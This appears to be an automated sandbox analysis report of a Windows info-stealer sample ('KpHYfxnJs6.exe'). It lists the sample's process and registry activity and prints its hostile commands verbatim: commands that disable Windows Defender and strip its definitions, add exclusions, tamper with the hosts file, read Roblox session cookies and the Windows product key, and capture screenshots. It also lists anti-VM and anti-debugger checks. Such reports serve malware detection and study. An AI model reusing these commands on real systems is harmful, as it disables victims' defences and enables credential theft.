              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7764 | Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\tree.com | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS (2 entries)
              Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
              Source: C:\Windows\SysWOW64\tree.com | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem (2 entries)
              Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem (2 entries)
              Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor (2 entries)
              Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed (31 entries)
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Last function: Thread delayed (2 entries)
              Source: C:\Windows\SysWOW64\PING.EXE | Last function: Thread delayed
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe | Code function: 109_2_00007FF6FAA446EC FindFirstFileW, FindFirstFileW, GetLastError, FindNextFileW, GetLastError
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe | Code function: 109_2_00007FF6FAA3E21C FindFirstFileW, FindClose, CreateFileW, DeviceIoControl, CloseHandle
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe | Code function: 109_2_00007FF6FAA888E0 FindFirstFileExA
              Source: getmac.exe, 00000057.00000002.2676819585.0000000003477000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000057.00000003.2674066441.0000000003474000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V
              Source: KpHYfxnJs6.exe, 00000004.00000003.2478427258.00000000074FE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vboxservice
              Source: getmac.exe, 00000057.00000003.2674066441.000000000349E000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000057.00000003.2675081406.000000000349E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: "SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage"K
              Source: KpHYfxnJs6.exe, 00000004.00000003.2478427258.00000000074FE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vmwareuser
              Source: getmac.exe, 00000057.00000003.2674066441.0000000003492000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000057.00000002.2677507170.0000000003492000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000057.00000003.2675211737.0000000003492000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SetPropValue.sSubKeyName("SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage");
              Source: KpHYfxnJs6.exe, 00000000.00000002.2912329036.00000000050D8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__4+<
              Source: getmac.exe, 00000057.00000002.2676819585.0000000003477000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000057.00000003.2674066441.0000000003474000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
              Source: KpHYfxnJs6.exe, 00000004.00000003.2478427258.00000000074FE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vmsrvc
              Source: KpHYfxnJs6.exe, 00000004.00000003.2603116149.0000000004E43000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484207815.0000000004E0A000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000002.2884329550.0000000004E45000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2881336814.0000000004E43000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484268459.0000000004E67000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484460219.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2744996096.0000000004E44000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll)
              Source: KpHYfxnJs6.exe, 00000004.00000003.2478427258.00000000074FE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vmwaretray
              Source: KpHYfxnJs6.exe, 00000004.00000003.2744344926.000000000767A000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2652879260.0000000007678000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2742827988.0000000007D4A000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2674550956.000000000762D000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2743962657.0000000007672000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2684446384.0000000007534000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2647658654.0000000007679000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2677988442.000000000762E000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2678531952.0000000007531000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2684053799.0000000007628000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
              Source: getmac.exe, 00000057.00000002.2676819585.0000000003477000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000057.00000003.2674066441.0000000003474000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Win32_NetworkProtocolHyper-V RAWHyper-VRAWHyper-V RAW`8<
              Source: KpHYfxnJs6.exe, 00000004.00000002.2887094971.0000000007680000.00000004.00001000.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2478525304.0000000007540000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2478427258.00000000074FE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vboxtray
              Source: KpHYfxnJs6.exe, 00000004.00000002.2887094971.0000000007680000.00000004.00001000.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2478525304.0000000007540000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2478427258.00000000074FE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: qemu-ga
              Source: KpHYfxnJs6.exe, 00000004.00000002.2887094971.0000000007680000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmware
              Source: getmac.exe, 00000057.00000003.2674898339.00000000034B4000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000057.00000002.2677991760.00000000034B5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\LinkageExport
              Source: KpHYfxnJs6.exe, 00000004.00000003.2478427258.00000000074FE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vmwareservicer`
              Source: KpHYfxnJs6.exe, 00000004.00000002.2887094971.0000000007680000.00000004.00001000.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2478525304.0000000007540000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2478427258.00000000074FE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vmusrvc
              Source: getmac.exe, 00000057.00000003.2674898339.00000000034B4000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000057.00000002.2677991760.00000000034B5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage
              Source: KpHYfxnJs6.exe, 00000004.00000003.2478427258.00000000074FE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vmtoolsd
              Source: KpHYfxnJs6.exe, 00000004.00000003.2478427258.00000000074FE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vmwarec
              Source: KpHYfxnJs6.exe, 00000000.00000003.1672563965.0000000004DE0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: \SystemRoot\system32\ntkrnlmp.exeST\VBOX__
              Source: KpHYfxnJs6.exe, 00000000.00000003.1672642166.0000000004DE0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: \SystemRoot\system32\ntkrnmp.exeSDT\VBOX__
              Source: KpHYfxnJs6.exe, 00000004.00000002.2887094971.0000000007680000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmwareservice
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | System information queried: ModuleInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | Process information queried: ProcessInformation

              Anti Debugging

              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | Thread information set: HideFromDebugger (2 entries)
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | Open window title or class name: regmonclass
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | Open window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | Open window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | Open window title or class name: ollydbg
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | Open window title or class name: filemonclass
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | Process queried: DebugPort (4 entries)
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | Process queried: DebugObjectHandle (2 entries)
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe | Code function: 109_2_00007FF6FAA84C10 RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe | Code function: 109_2_00007FF6FAA89D20 GetProcessHeap
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug (9 entries)
              Source: C:\Windows\SysWOW64\tasklist.exe | Process token adjusted: Debug (5 entries)
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA7B52C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,109_2_00007FF6FAA7B52C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA7B6D8 SetUnhandledExceptionFilter,109_2_00007FF6FAA7B6D8
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA7A66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,109_2_00007FF6FAA7A66C

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KpHYfxnJs6.exe'"
              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KpHYfxnJs6.exe'
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr'"
              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr'
              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
              Source: C:\Windows\SysWOW64\cmd.exe Process created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe File written: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Process created: C:\Users\user\Desktop\KpHYfxnJs6.exe "C:\Users\user\Desktop\KpHYfxnJs6.exe"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('VERISON NOT SUPPORT (WAIT FOR UPDATE)', 0, 'CLOSING ALL APPS FOR BOTNET', 0+16);close()"
              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\attrib.exe attrib +h +s "C:\Users\user\Desktop\KpHYfxnJs6.exe"
              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tree.com tree /A /F
              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bifucm0t\bifucm0t.cmdline"
              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESED03.tmp" "c:\Users\user\AppData\Local\Temp\bifucm0t\CSCB2EB15F711B84CFFA3556DECAB136738.TMP"
              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\getmac.exe getmac
              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe a -r -hp"grabber" "C:\Users\user\AppData\Local\Temp\CoY55.zip" *
              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic os get Caption
              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping localhost -n 3
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Process created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand [base64-encoded command blob omitted]
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand [base64-encoded command blob omitted]
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Process created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Process created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand [base64-encoded command blob omitted]
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand [base64-encoded command blob omitted]
Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA6B340 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,109_2_00007FF6FAA6B340
Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA8DE20 cpuid 109_2_00007FF6FAA8DE20
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformation
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202 VolumeInformation
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202 VolumeInformation
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202 VolumeInformation
